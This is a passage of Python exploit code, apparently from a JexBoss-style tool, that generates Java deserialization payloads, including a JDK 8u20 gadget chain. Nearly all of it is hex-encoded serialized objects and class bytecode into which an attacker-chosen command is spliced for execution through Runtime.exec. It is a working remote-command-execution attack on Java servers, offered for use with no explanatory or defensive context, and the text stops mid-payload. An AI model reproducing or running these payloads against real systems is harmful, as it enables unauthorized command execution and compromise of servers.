\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\
\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x40\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\
\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\
\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6E\x73\
\x6C\x65\x74\x01\x00\x14\x6A\x61\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\
\x6C\x65\x01\x00\x39\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\
\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x54\x72\x61\
\x6E\x73\x6C\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x01\x00\x1F\x79\x73\x6F\x73\x65\x72\x69\
\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\
\x01\x00\x08\x3C\x63\x6C\x69\x6E\x69\x74\x3E\x01\x00\x11\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\
\x52\x75\x6E\x74\x69\x6D\x65\x07\x00\x2A\x01\x00\x0A\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x01\
\x00\x15\x28\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\x6D\x65\x3B\x0C\
\x00\x2C\x00\x2D\x0A\x00\x2B\x00\x2E\x01\x00")
if version_info[0] >= 3:
payload += (bytes(chr(len(cmd)), 'utf-8'))
payload += (bytes(cmd, 'utf-8'))
else:
payload += (chr(len(cmd)))
payload += (cmd)
payload += (b"\x08\x00\x30\x01\x00\x04\
\x65\x78\x65\x63\x01\x00\x27\x28\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\
\x67\x3B\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x50\x72\x6F\x63\x65\x73\x73\x3B\x0C\x00\
\x32\x00\x33\x0A\x00\x2B\x00\x34\x01\x00\x21\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\x65\x78\
\x42\x6F\x73\x73\x32\x36\x31\x34\x31\x39\x33\x31\x34\x30\x38\x37\x38\x37\x35\x39\x01\x00\x23\x4C\
\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\x65\x78\x42\x6F\x73\x73\x32\x36\x31\x34\x31\x39\x33\
\x31\x34\x30\x38\x37\x38\x37\x35\x39\x3B\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\
\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04\x00\x01\x00\x0A\x00\x0B\x00\x01\
\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\
\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2E\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\
\x0F\x00\x37\x00\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0C\x00\x00\x00\x3F\x00\x00\x00\x03\x00\
\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x33\x00\x0E\x00\x00\
\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0F\x00\x37\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\
\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x01\x00\x13\
\x00\x1B\x00\x02\x00\x0C\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\
\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x0E\x00\x00\x00\x2A\x00\x04\x00\x00\x00\x01\x00\
\x0F\x00\x37\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1C\x00\x1D\x00\
\x02\x00\x00\x00\x01\x00\x1E\x00\x1F\x00\x03\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x08\x00\
\x29\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x1B\x00\x03\x00\x02\x00\x00\x00\x0F\xA7\x00\x03\x01\x4C\
\xB8\x00\x2F\x12\x31\xB6\x00\x35\x57\xB1\x00\x00\x00\x00\x00\x02\x00\x20\x00\x00\x00\x02\x00\x21\
\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00\x7E\x00\x0C\x00\x00\
\x01\xD4\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x1B\x0A\x00\x03\x00\x15\x07\x00\x17\x07\x00\x18\x07\
\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\
\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\x71\xE6\x69\xEE\x3C\x6D\
\x47\x18\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\
\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\
\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\
\x03\x46\x6F\x6F\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x25\x4C\x79\
\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\
\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x3B\x01\x00\x0A\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\
\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\x61\x0C\x00\x0A\x00\x0B\x07\x00\x1A\x01\
\x00\x23\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\
\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x01\x00\x10\x6A\x61\x76\x61\x2F\x6C\x61\x6E\
\x67\x2F\x4F\x62\x6A\x65\x63\x74\x01\x00\x14\x6A\x61\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\
\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x1F\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\
\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\
\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\
\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\
\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3B\x00\x0E\x00\x00\x00\x0C\
\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\
\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x07\x6A\x65\x78\x62\x6F\x73\
\x73\x70\x77\x01\x00\x78\x73\x7D\x00\x00\x00\x01\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\
\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x78\x72\x00\x17\x6A\
\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\
\xDA\x20\xCC\x10\x43\xCB\x02\x00\x01\x4C\x00\x01\x68\x74\x00\x25\x4C\x6A\x61\x76\x61\x2F\x6C\x61\
\x6E\x67\x2F\x72\x65\x66\x6C\x65\x63\x74\x2F\x49\x6E\x76\x6F\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\
\x64\x6C\x65\x72\x3B\x78\x70\x73\x72\x00\x32\x73\x75\x6E\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x61\
\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x2E\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x49\x6E\x76\x6F\
\x63\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x55\xCA\xF5\x0F\x15\xCB\x7E\xA5\x02\x00\x02\
\x4C\x00\x0C\x6D\x65\x6D\x62\x65\x72\x56\x61\x6C\x75\x65\x73\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\
\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B\x4C\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4C\x6A\x61\x76\x61\
\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\
\x74\x69\x6C\x2E\x48\x61\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\
\x0A\x6C\x6F\x61\x64\x46\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\
\x70\x3F\x40\x00\x00\x00\x00\x00\x0C\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x74\x00\x08\x66\x35\
\x61\x35\x61\x36\x30\x38\x71\x00\x7E\x00\x09\x78\x76\x72\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\
\x6C\x2E\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x78")
return payload
def generate_jdk8u20_payload(cmd):
# improved from Alvaro (pwntester) version
payload = (b"\xAC\xED\x00\x05\x73\x72\x00\x17\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x4C\x69\x6E\x6B\x65\
\x64\x48\x61\x73\x68\x53\x65\x74\xD8\x6C\xD7\x5A\x95\xDD\x2A\x1E\x02\x00\x00\x78\x72\x00\x11\x6A\
\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\
\x03\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x10\x3F\x40\x00\x00\x00\x00\x00\x02\x73\x72\x00\x3A\x63\
\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x78\x61\x6C\x61\x6E\x2E\
\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\x74\x63\x2E\x74\x72\x61\x78\x2E\x54\x65\x6D\x70\
\x6C\x61\x74\x65\x73\x49\x6D\x70\x6C\x09\x57\x4F\xC1\x6E\xAC\xAB\x33\x03\x00\x09\x49\x00\x0D\x5F\
\x69\x6E\x64\x65\x6E\x74\x4E\x75\x6D\x62\x65\x72\x49\x00\x0E\x5F\x74\x72\x61\x6E\x73\x6C\x65\x74\
\x49\x6E\x64\x65\x78\x5A\x00\x15\x5F\x75\x73\x65\x53\x65\x72\x76\x69\x63\x65\x73\x4D\x65\x63\x68\
\x61\x6E\x69\x73\x6D\x4C\x00\x19\x5F\x61\x63\x63\x65\x73\x73\x45\x78\x74\x65\x72\x6E\x61\x6C\x53\
\x74\x79\x6C\x65\x73\x68\x65\x65\x74\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\
\x74\x72\x69\x6E\x67\x3B\x4C\x00\x0B\x5F\x61\x75\x78\x43\x6C\x61\x73\x73\x65\x73\x74\x00\x3B\x4C\
\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\
\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\
\x48\x61\x73\x68\x74\x61\x62\x6C\x65\x3B\x5B\x00\x0A\x5F\x62\x79\x74\x65\x63\x6F\x64\x65\x73\x74\
\x00\x03\x5B\x5B\x42\x5B\x00\x06\x5F\x63\x6C\x61\x73\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\
\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x05\x5F\x6E\x61\x6D\x65\x71\x00\x7E\x00\x05\
\x4C\x00\x11\x5F\x6F\x75\x74\x70\x75\x74\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4C\
\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x3B\x78\x70\x00\
\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x74\x00\x03\x61\x6C\x6C\x70\x75\x72\x00\x03\x5B\x5B\x42\x4B\xFD\
\x19\x15\x67\x67\xDB\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5B\x42\xAC\xF3\x17\
\xF8\x06\x08\x54\xE0\x02\x00\x00\x78\x70\x00\x00\x06")
if version_info[0] >= 3:
payload += (bytes(chr(len(cmd)+147), 'utf-8'))
else:
payload += (chr(len(cmd)+147))
payload += (b"\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x3A\
\x0A\x00\x03\x00\x24\x07\x00\x38\x07\x00\x27\x07\x00\x28\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\
\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\
\x56\x61\x6C\x75\x65\x05\xAD\x20\x93\xF3\x91\xDD\xEF\x3E\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\
\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\
\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\
\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\
\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\
\x00\x22\x4C\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\
\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x3B\x01\x00\x09\x74\x72\x61\x6E\x73\x66\x6F\x72\x6D\
\x01\x00\x72\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\
\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\
\x3B\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\
\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\
\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\
\x64\x6F\x63\x75\x6D\x65\x6E\x74\x01\x00\x2D\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\
\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\
\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x01\x00\x08\x68\x61\x6E\x64\x6C\x65\x72\x73\x01\x00\x42\x5B\x4C\
\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\
\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\
\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\x45\x78\x63\x65\x70\
\x74\x69\x6F\x6E\x73\x07\x00\x29\x01\x00\xA6\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\
\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\
\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\
\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\
\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\
\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\
\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\
\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6F\x72\x01\x00\x35\x4C\
\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\
\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\
\x74\x6F\x72\x3B\x01\x00\x07\x68\x61\x6E\x64\x6C\x65\x72\x01\x00\x41\x4C\x63\x6F\x6D\x2F\x73\x75\
\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\
\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\
\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x23\x6F\x72\x67\x2E\x6E\x65\x74\x62\x65\x61\x6E\
\x73\x2E\x53\x6F\x75\x72\x63\x65\x4C\x65\x76\x65\x6C\x41\x6E\x6E\x6F\x74\x61\x74\x69\x6F\x6E\x73\
\x01\x00\x14\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x76\x65\x72\x72\x69\x64\x65\x3B\x01\
\x00\x0A\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\
\x61\x76\x61\x0C\x00\x0A\x00\x0B\x07\x00\x2A\x01\x00\x20\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\
\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\
\x40\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\
\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\
\x2F\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6E\x73\x6C\x65\x74\x01\x00\x14\x6A\x61\x76\x61\
\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x39\x63\x6F\x6D\x2F\x73\
\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\
\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x54\x72\x61\x6E\x73\x6C\x65\x74\x45\x78\x63\x65\x70\
\x74\x69\x6F\x6E\x01\x00\x0C\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x01\x00\x08\x3C\x63\
\x6C\x69\x6E\x69\x74\x3E\x01\x00\x11\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\
\x6D\x65\x07\x00\x2C\x01\x00\x0A\x67\x65\x74\x52\x75\x6E\x74\x69\x6D\x65\x01\x00\x15\x28\x29\x4C\
\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\x6D\x65\x3B\x0C\x00\x2E\x00\x2F\x0A\
\x00\x2D\x00\x30\x01\x00")
if version_info[0] >= 3:
payload += (bytes(chr(len(cmd)), 'utf-8'))
payload += (bytes(cmd, 'utf-8'))
else:
payload += (chr(len(cmd)))
payload += (cmd)
payload += (b"\x08\x00\x32\x01\x00\x04\x65\x78\x65\x63\x01\x00\x27\x28\x4C\x6A\x61\
\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\
\x6E\x67\x2F\x50\x72\x6F\x63\x65\x73\x73\x3B\x0C\x00\x34\x00\x35\x0A\x00\x2D\x00\x36\x01\x00\x21\
\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\x65\x78\x42\x6F\x73\x73\x32\x34\x34\x39\x35\x35\x33\
\x38\x34\x30\x35\x36\x33\x33\x37\x38\x01\x00\x23\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x4A\
\x65\x78\x42\x6F\x73\x73\x32\x34\x34\x39\x35\x35\x33\x38\x34\x30\x35\x36\x33\x33\x37\x38\x3B\x00\
\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\
\x02\x00\x08\x00\x04\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\
\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x1C\
\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x39\x00\x00\x00\x01\x00\x13\x00\x14\
\x00\x02\x00\x0C\x00\x00\x00\x3F\x00\x00\x00\x03\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\
\x00\x00\x06\x00\x01\x00\x00\x00\x1F\x00\x0E\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0F\x00\
\x39\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\
\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x01\x00\x13\x00\x1B\x00\x03\x00\x0C\x00\x00\x00\x49\x00\
\x00\x00\x04\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x22\
\x00\x0E\x00\x00\x00\x2A\x00\x04\x00\x00\x00\x01\x00\x0F\x00\x39\x00\x00\x00\x00\x00\x01\x00\x15\
\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1C\x00\x1D\x00\x02\x00\x00\x00\x01\x00\x1E\x00\x1F\x00\x03\
\x00\x19\x00\x00\x00\x04\x00\x01\x00\x1A\x00\x20\x00\x00\x00\x06\x00\x01\x00\x21\x00\x00\x00\x08\
\x00\x2B\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x1B\x00\x03\x00\x02\x00\x00\x00\x0F\xA7\x00\x03\x01\
\x4C\xB8\x00\x31\x12\x33\xB6\x00\x37\x57\xB1\x00\x00\x00\x00\x00\x02\x00\x22\x00\x00\x00\x02\x00\
\x23\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x25\x00\x10\x00\x09\x75\x71\x00\x7E\x00\x0D\x00\
\x00\x01\x9B\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x1B\x0A\x00\x03\x00\x15\x07\x00\x17\x07\x00\x18\
\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\
\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\x71\xE6\x69\xEE\x3C\
\x6D\x47\x18\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\
\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\
\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\
\x00\x03\x46\x6F\x6F\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x12\x4C\
\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x3B\x01\x00\x0A\x53\x6F\x75\x72\
\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\x61\x0C\x00\x0A\
\x00\x0B\x07\x00\x1A\x01\x00\x10\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\
\x01\x00\x10\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x01\x00\x14\x6A\x61\
\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x0C\x75\x74\x69\
\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\
\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\
\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\
\x00\x00\x00\x06\x00\x01\x00\x00\x00\x26\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\
\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\
\x00\x16\x00\x10\x00\x09\x70\x74\x00\x07\x6A\x65\x78\x62\x6F\x73\x73\x70\x77\x01\x00\x78\x73\x7D\
\x00\x00\x00\x01\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\x74\x72\x61\x6E\x73\x66\x6F\x72\
\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x78\x72\x00\x17\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\
\x2E\x72\x65\x66\x6C\x65\x63\x74\x2E\x50\x72\x6F\x78\x79\xE1\x27\xDA\x20\xCC\x10\x43\xCB\x02\x00\
